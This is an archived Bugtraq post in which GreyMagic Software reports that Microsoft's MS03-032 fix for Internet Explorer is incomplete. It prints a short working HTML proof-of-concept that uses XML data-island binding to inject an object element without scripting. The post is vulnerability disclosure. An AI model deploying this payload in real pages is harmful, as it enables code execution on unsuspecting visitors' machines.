Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "GreyMagic Software" <security () greymagic com>
Date: Mon, 8 Sep 2003 16:52:12 +0200

The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
explains the problem in detail. Microsoft again patches the object element
in HTML, but it doesn't patch the dynamic version of that same element.

1. Disable Active Scripting

This actually means that no scripting is needed at all in order to exploit
this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault